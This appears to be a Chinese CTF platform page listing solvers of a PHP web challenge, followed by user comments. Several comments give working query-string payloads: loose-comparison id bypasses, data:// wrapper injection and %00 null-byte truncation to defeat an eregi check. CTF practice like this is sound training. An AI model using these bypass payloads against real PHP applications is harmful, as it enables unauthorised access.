评分(26)
解题动态
SkyAsh 攻破了该题 7小时前
南京交通第一深情徐立超 攻破了该题 2天前
陌兮li 攻破了该题 3天前
123jiji 攻破了该题 4天前
Exercise111 攻破了该题 4天前
迈克尔才 攻破了该题 6天前
ctfldc 攻破了该题 7天前
言寺介 攻破了该题 9天前
hulihaha 攻破了该题 9天前
ikunqq 攻破了该题 9天前
WindZQ 攻破了该题 9天前
hyshjkl 攻破了该题 9天前
994444 攻破了该题 9天前
yypui 攻破了该题 9天前
luopingfu 攻破了该题 9天前
asdf12 攻破了该题 9天前
GETING 攻破了该题 10天前
容大晋 攻破了该题 11天前
叶子璐 攻破了该题 11天前
评论
霓虹 11天前
举报
wp解答的源代码不一样,避雷
藏在云层里的羊 18天前
举报
/?id=00&a=data://text/plain,bugku is a nice plateform!&b=.111111 不用那么复杂啊
藏在云层里的羊 18天前
举报
/?id=00&a=data://text/plain,bugku is a nice plateform!&b=.111111 不用那么复杂啊
对对对对对对对对 2月前
举报
依旧有点意思
soha 2月前
举报
$b的限制eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)用%00字符截断绕过,$a用data://text/plain,文本内容,id=0传参
caicai0728 2月前
举报
解题参考:https://blog.csdn.net/cai_huaer/article/details/153694389?spm=1001.2014.3001.5501
2686213396 6月前
举报
bp抓包,发现第一个相应中有隐藏目录,访问进去,发现加密的JS代码,先后进行url、base64、url解码,得到目标php代码,,根据代码要求,绕过id,a,b的比较,获得flag
iNMB 6月前
举报
?id=00&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=&b=......
zhuizhui 6月前
举报
?id=0a&a=data://text/plain,bugku%20is%20a%20nice%20plateform!&b=%00111bhv14
breeding 7月前
举报
curl '<ip:port>/1p.html'获取到word的值,先url解码,再把解码得到的注释用base64再解一次码就可以得到php源代码了,根据源代码构建url参数:/hello.php?id=00&a=data://text/plain,bugku%20is%20a%20nice%20platform!&b=.12345